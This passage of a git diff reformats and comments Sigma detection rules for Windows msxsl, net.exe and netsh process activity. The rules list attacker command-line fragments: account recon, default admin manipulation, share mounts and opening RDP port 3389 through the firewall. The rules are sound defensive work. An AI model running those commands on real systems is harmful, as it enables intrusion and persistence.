whitelisting defenses. - - ' +description: | + Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. + Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/ @@ -31,5 +26,6 @@ detection: condition: process_creation and selection falsepositives: - Msxsl is not installed by default and is deprecated, so unlikely on most systems. +# Note: If you levreage this utility please consider adding additional filters. As this is looking for "any" type of execition level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_msxsl_remote_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_msxsl_remote_execution.yml index 63512a272..594055cb1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msxsl_remote_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msxsl_remote_execution.yml @@ -1,8 +1,7 @@ title: Remote XSL Execution Via Msxsl.EXE id: 75d0a94e-6252-448d-a7be-d953dff527bb status: experimental -description: Detects the execution of the "msxsl" binary with an "http" keyword in - the command line. This might indicate a potential remote execution of XSL files. +description: Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/ @@ -21,7 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \msxsl.exe - CommandLine|contains: http + CommandLine|contains: http condition: process_creation and selection falsepositives: - Msxsl is not installed by default and is deprecated, so unlikely on most systems. diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_default_accounts_manipulation.yml b/sigma/sysmon/process_creation/proc_creation_win_net_default_accounts_manipulation.yml index 4408b5173..2a22095b7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_default_accounts_manipulation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_default_accounts_manipulation.yml @@ -1,8 +1,7 @@ title: Suspicious Manipulation Of Default Accounts Via Net.EXE id: 5b768e71-86f2-4879-b448-81061cbae951 status: test -description: Detects suspicious manipulations of default accounts such as 'administrator' - and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc +description: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc references: - https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ @@ -22,54 +21,53 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_user_option: - CommandLine|contains: ' user ' + CommandLine|contains: ' user ' selection_username: - CommandLine|contains: - - " J\xE4rjestelm\xE4nvalvoja " - - ' Rendszergazda ' - - " \u0410\u0434\u043C\u0438\u043D\u0438\u0441\u0442\u0440\u0430\u0442\ - \u043E\u0440 " - - ' Administrateur ' - - ' Administrador ' - - " Administrat\xF6r " - - ' Administrator ' + CommandLine|contains: + # Note: We need to write the full account name for cases starting with 'admin' to avoid lookups only with the user flag + - ' Järjestelmänvalvoja ' # Finish + - ' Rendszergazda ' # Hungarian + - ' Администратор ' # Russian + - ' Administrateur ' # French + - ' Administrador ' # Portuguese (Brazil + Portugal) + Spanish + - ' Administratör ' # Swedish + - ' Administrator ' # English - ' guest ' - ' DefaultAccount ' - - " \"J\xE4rjestelm\xE4nvalvoja\" " - - ' "Rendszergazda" ' - - " \"\u0410\u0434\u043C\u0438\u043D\u0438\u0441\u0442\u0440\u0430\u0442\ - \u043E\u0440\" " - - ' "Administrateur" ' - - ' "Administrador" ' - - " \"Administrat\xF6r\" " - - ' "Administrator" ' + # The cases below are for when an attacker requests the net command via 'cmd /c....' + # First in double quotes + - ' "Järjestelmänvalvoja" ' # Finish + - ' "Rendszergazda" ' # Hungarian + - ' "Администратор" ' # Russian + - ' "Administrateur" ' # French + - ' "Administrador" ' # Portuguese (Brazil + Portugal) + Spanish + - ' "Administratör" ' # Swedish + - ' "Administrator" ' # English - ' "guest" ' - ' "DefaultAccount" ' - - " 'J\xE4rjestelm\xE4nvalvoja' " - - ' ''Rendszergazda'' ' - - " '\u0410\u0434\u043C\u0438\u043D\u0438\u0441\u0442\u0440\u0430\u0442\ - \u043E\u0440' " - - ' ''Administrateur'' ' - - ' ''Administrador'' ' - - " 'Administrat\xF6r' " - - ' ''Administrator'' ' - - ' ''guest'' ' - - ' ''DefaultAccount'' ' + # Second in single quotes + - " 'Järjestelmänvalvoja' " # Finish + - " 'Rendszergazda' " # Hungarian + - " 'Администратор' " # Russian + - " 'Administrateur' " # French + - " 'Administrador' " # Portuguese (Brazil + Portugal) + Spanish + - " 'Administratör' " # Swedish + - " 'Administrator' " # English + - " 'guest' " + - " 'DefaultAccount' " filter: - CommandLine|contains|all: + CommandLine|contains|all: - guest - /active no condition: process_creation and (all of selection_* and not filter) falsepositives: - - Some false positives could occur with the admin or guest account. It depends - on the scripts being used by the admins in your env. If you experience a lot - of FP you could reduce the level to medium + - Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml index 81421b066..b8b30ee10 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml @@ -1,14 +1,12 @@ title: Suspicious Group And Account Reconnaissance Activity Using Net.EXE id: d95de845-b83c-4a9a-8a6a-4fc802ebf6c0 status: test -description: Detects suspicious reconnaissance command line activity on Windows systems - using Net.EXE +description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE references: - https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/ - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/ -author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali - (Nextron Systems) +author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems) date: 2019/01/16 modified: 2023/03/02 tags: @@ -24,35 +22,38 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe + # Covers group and localgroup flags selection_group_root: - CommandLine|contains: + CommandLine|contains: - ' group ' - ' localgroup ' selection_group_flags: - CommandLine|contains: + CommandLine|contains: + # Add more groups for other languages - domain admins - - ' administrator' - - ' administrateur' + - ' administrator' # Typo without an 'S' so we catch both + - ' administrateur' # Typo without an 'S' so we catch both - enterprise admins - Exchange Trusted Subsystem - Remote Desktop Users - - "Utilisateurs du Bureau \xE0 distance" - - Usuarios de escritorio remoto - - ' /do' + - Utilisateurs du Bureau à distance # French for "Remote Desktop Users" + - Usuarios de escritorio remoto # Spanish for "Remote Desktop Users" + - ' /do' # short for domain filter_group_add: - CommandLine|contains: ' /add' + # This filter is added to avoid the potential case where the point is not recon but addition + CommandLine|contains: ' /add' + # Covers 'accounts' flag selection_accounts_root: - CommandLine|contains: ' accounts ' + CommandLine|contains: ' accounts ' selection_accounts_flags: - CommandLine|contains: ' /do' - condition: process_creation and (selection_img and ((all of selection_group_* - and not filter_group_add) or all of selection_accounts_*)) + CommandLine|contains: ' /do' # short for domain + condition: process_creation and (selection_img and ((all of selection_group_* and not filter_group_add) or all of selection_accounts_*)) fields: - CommandLine - ParentCommandLine @@ -61,6 +62,5 @@ falsepositives: - Administrative activity level: medium analysis: - recommendation: Check if the user that executed the commands is suspicious (e.g. - service accounts, LOCAL_SYSTEM) + recommendation: Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM) ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_network_connections_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_net_network_connections_discovery.yml index 4d56d9f19..3448866d4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_network_connections_discovery.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_network_connections_discovery.yml @@ -1,9 +1,7 @@ title: System Network Connections Discovery Via Net.EXE id: 1c67a717-32ba-409b-a45d-0fb704a73a81 status: test -description: Adversaries may attempt to get a listing of network connections to or - from the compromised system they are currently accessing or from remote systems - by querying for information over the network. +description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery author: frack113 @@ -21,19 +19,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - - CommandLine|endswith: - - ' use' - - ' sessions' - - CommandLine|contains: - - ' use ' - - ' sessions ' + - CommandLine|endswith: + - ' use' + - ' sessions' + - CommandLine|contains: + - ' use ' + - ' sessions ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_share_and_sessions_enum.yml b/sigma/sysmon/process_creation/proc_creation_win_net_share_and_sessions_enum.yml index 668b1edbc..76c97450c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_share_and_sessions_enum.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_share_and_sessions_enum.yml @@ -1,8 +1,7 @@ title: Share And Session Enumeration Using Net.EXE id: 62510e69-616b-4078-b371-847da438cc03 status: stable -description: Detects attempts to enumerate file shares, printer shares and sessions - using "net.exe" with the "view" flag. +description: Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag. references: - https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md @@ -21,16 +20,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains: view + CommandLine|contains: view filter: - CommandLine|contains: \\\\ + CommandLine|contains: \\\\ condition: process_creation and (all of selection_* and not filter) fields: - ComputerName diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_share_unmount.yml b/sigma/sysmon/process_creation/proc_creation_win_net_share_unmount.yml index b0916ba2d..b0454ef25 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_share_unmount.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_share_unmount.yml @@ -1,9 +1,7 @@ title: Unmount Share Via Net.EXE id: cb7c4a03-2871-43c0-9bbb-18bbdb079896 status: test -description: Detects when when a mounted share is removed. Adversaries may remove - share connections that are no longer useful in order to clean up traces of their - operation +description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md author: oscd.community, @redcanary, Zach Stanford @svch0st @@ -21,14 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - share - /delete condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_start_service.yml b/sigma/sysmon/process_creation/proc_creation_win_net_start_service.yml index e908820fc..1bb29cde9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_start_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_start_service.yml @@ -1,8 +1,7 @@ title: Start Windows Service Via Net.EXE id: 2a072a96-a086-49fa-bcb5-15cc5a619093 status: test -description: Detects the usage of the "net.exe" command to start a service using the - "start" flag +description: Detects the usage of the "net.exe" command to start a service using the "start" flag references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community @@ -20,14 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains: ' start ' + CommandLine|contains: ' start ' # space character after the 'start' keyword indicates that a service name follows, in contrast to `net start` discovery expression condition: process_creation and (all of selection_*) falsepositives: - Legitimate administrator or user executes a service for legitimate reasons. diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_stop_service.yml b/sigma/sysmon/process_creation/proc_creation_win_net_stop_service.yml index fc9c39eb6..87b37b596 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_stop_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_stop_service.yml @@ -1,8 +1,8 @@ title: Stop Windows Service Via Net.EXE id: 88872991-7445-4a22-90b2-a3adadb0e827 related: - - id: eb87818d-db5d-49cc-a987-d5da331fbd90 - type: obsoletes + - id: eb87818d-db5d-49cc-a987-d5da331fbd90 + type: obsoletes status: test description: Detects the stopping of a Windows service author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) @@ -19,17 +19,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: - - net.exe - - net1.exe - - Image|endswith: - - \net.exe - - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe selection_cli: - CommandLine|contains: ' stop ' + CommandLine|contains: ' stop ' condition: process_creation and (all of selection_*) falsepositives: - - There are many legitimate reasons to stop a service. This rule isn't looking - for any suspicious behaviour in particular. Filter legitimate activity accordingly + - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_net_susp_execution.yml index 5e49b77ae..aa1546242 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_susp_execution.yml @@ -8,8 +8,7 @@ references: - https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html - https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe -author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community - (improvements) +author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements) date: 2019/01/16 modified: 2022/07/11 tags: @@ -35,14 +34,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' group' - ' localgroup' - ' user' @@ -58,7 +57,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine - following the search for easy hunting by computer/CommandLine. + - Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine. level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_admin_share.yml b/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_admin_share.yml index edd2390b3..0933db629 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_admin_share.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_admin_share.yml @@ -1,14 +1,13 @@ title: Windows Admin Share Mount Via Net.EXE id: 3abd6094-7027-475f-9630-8ab9be7b9725 related: - - id: f117933c-980c-4f78-b384-e3d838111165 - type: similar + - id: f117933c-980c-4f78-b384-e3d838111165 + type: similar status: test description: Detects when an admin share is mounted using net.exe references: - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view -author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, - wagga +author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga date: 2020/10/05 modified: 2023/02/21 tags: @@ -23,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' use ' - ' \\\\*\\*$' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_internet_share.yml b/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_internet_share.yml index 45c2473b3..fdcc3e91f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_internet_share.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_internet_share.yml @@ -1,8 +1,7 @@ title: Windows Internet Hosted WebDav Share Mount Via Net.EXE id: 7e6237fe-3ddb-438f-9381-9bf9de5af8d0 status: experimental -description: Detects when an internet hosted webdav share is mounted using the "net.exe" - utility +description: Detects when an internet hosted webdav share is mounted using the "net.exe" utility references: - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view author: Nasreddine Bencherchali (Nextron Systems) @@ -20,14 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' use ' - ' http' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_share.yml b/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_share.yml index 99ca18210..d56b6a6cf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_share.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_use_mount_share.yml @@ -1,8 +1,8 @@ title: Windows Share Mount Via Net.EXE id: f117933c-980c-4f78-b384-e3d838111165 related: - - id: 3abd6094-7027-475f-9630-8ab9be7b9725 - type: similar + - id: 3abd6094-7027-475f-9630-8ab9be7b9725 + type: similar status: test description: Detects when a share is mounted using the "net.exe" utility references: @@ -22,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' use ' - ' \\\\' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_use_password_plaintext.yml b/sigma/sysmon/process_creation/proc_creation_win_net_use_password_plaintext.yml index 9cba7905e..c4870e631 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_use_password_plaintext.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_use_password_plaintext.yml @@ -24,19 +24,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' use ' - :*\\ - /USER:* * filter_empty: - CommandLine|endswith: ' ' + CommandLine|endswith: ' ' condition: process_creation and (all of selection_* and not 1 of filter*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_user_add.yml b/sigma/sysmon/process_creation/proc_creation_win_net_user_add.yml index f07403d53..b2a9cf758 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_user_add.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_user_add.yml @@ -1,8 +1,8 @@ title: New User Created Via Net.EXE id: cd219ff3-fa99-45d4-8380-a7d15116c6dc related: - - id: b9f0e6f5-09b4-4358-bae4-08408705bd5c - type: similar + - id: b9f0e6f5-09b4-4358-bae4-08408705bd5c + type: similar status: test description: Identifies the creation of local users via the net.exe command. references: @@ -23,14 +23,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - user - add condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_user_add_never_expire.yml b/sigma/sysmon/process_creation/proc_creation_win_net_user_add_never_expire.yml index ccfe5c889..a062c0876 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_user_add_never_expire.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_user_add_never_expire.yml @@ -1,11 +1,10 @@ title: New User Created Via Net.EXE With Never Expire Option id: b9f0e6f5-09b4-4358-bae4-08408705bd5c related: - - id: cd219ff3-fa99-45d4-8380-a7d15116c6dc - type: derived + - id: cd219ff3-fa99-45d4-8380-a7d15116c6dc + type: derived status: test -description: Detects creation of local users via the net.exe command with the option - "never expire" +description: Detects creation of local users via the net.exe command with the option "never expire" references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ author: Nasreddine Bencherchali (Nextron Systems) @@ -23,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - user - add - expires:never diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_add_rule.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_add_rule.yml index cc9140724..daa81cb06 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_add_rule.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_add_rule.yml @@ -20,18 +20,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' firewall ' - ' add ' filter_optional_dropbox: - CommandLine|contains: - - advfirewall firewall add rule name=Dropbox dir=in action=allow "program=?:\Program - Files (x86)\Dropbox\Client\Dropbox.exe" enable=yes profile=Any - - advfirewall firewall add rule name=Dropbox dir=in action=allow "program=?:\Program - Files\Dropbox\Client\Dropbox.exe" enable=yes profile=Any + CommandLine|contains: + - advfirewall firewall add rule name=Dropbox dir=in action=allow "program=?:\Program Files (x86)\Dropbox\Client\Dropbox.exe" enable=yes profile=Any + - advfirewall firewall add rule name=Dropbox dir=in action=allow "program=?:\Program Files\Dropbox\Client\Dropbox.exe" enable=yes profile=Any condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - Legitimate administration activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml index bf7c0a62f..d808e35f4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml @@ -1,8 +1,7 @@ title: Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE id: a35f5a72-f347-4e36-8895-9869b0d5fc6d status: test -description: Detects Netsh command execution that whitelists a program located in - a suspicious location in the Windows Firewall +description: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall references: - https://www.virusradar.com/en/Win32_Kasidet.AD/description - https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100 @@ -21,22 +20,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - - CommandLine|contains|all: - - firewall - - add - - allowedprogram - - CommandLine|contains|all: - - advfirewall - - firewall - - add - - rule - - action=allow - - program= + - CommandLine|contains|all: + - firewall + - add + - allowedprogram + - CommandLine|contains|all: + - advfirewall + - firewall + - add + - rule + - action=allow + - program= selection_paths: - CommandLine|contains: + CommandLine|contains: - :\$Recycle.bin\ - :\RECYCLER.BIN\ - :\RECYCLERS.BIN\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml index 6eefb6ff0..33c1db3cb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml @@ -1,8 +1,7 @@ title: RDP Connection Allowed Via Netsh.EXE id: 01aeb693-138d-49d2-9403-c4f52d7d3d62 status: test -description: Detects usage of the netsh command to open and allow connections to port - 3389 (RDP). As seen used by Sarwent Malware +description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware references: - https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/ author: Sander Wiebing @@ -20,15 +19,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + # Example: + # Old: netsh firewall add portopening TCP 3389 "Open Port 3389" + # New: netsh advfirewall firewall add rule name= "Open Port 3389" dir=in action=allow protocol=TCP localport=3389 + CommandLine|contains|all: - 'firewall ' - 'add ' - 'tcp ' - '3389' - CommandLine|contains: + CommandLine|contains: - portopening - allow condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_delete_rule.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_delete_rule.yml index 2dc9a4306..b24afac90 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_delete_rule.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_delete_rule.yml @@ -1,8 +1,7 @@ title: Firewall Rule Deleted Via Netsh.EXE id: 1a5fefe6-734f-452e-a07d-fc1c35bce4b2 status: test -description: Detects the removal of a port or application rule in the Windows Firewall - configuration using netsh +description: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh references: - https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/ author: frack113 @@ -20,15 +19,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - firewall - 'delete ' filter_optional_dropbox: ParentImage|endswith: \Dropbox.exe - CommandLine|contains: name=Dropbox + CommandLine|contains: name=Dropbox condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - Legitimate administration activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_disable.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_disable.yml index eae00c3ca..b504df2ed 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_disable.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_disable.yml @@ -22,20 +22,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational 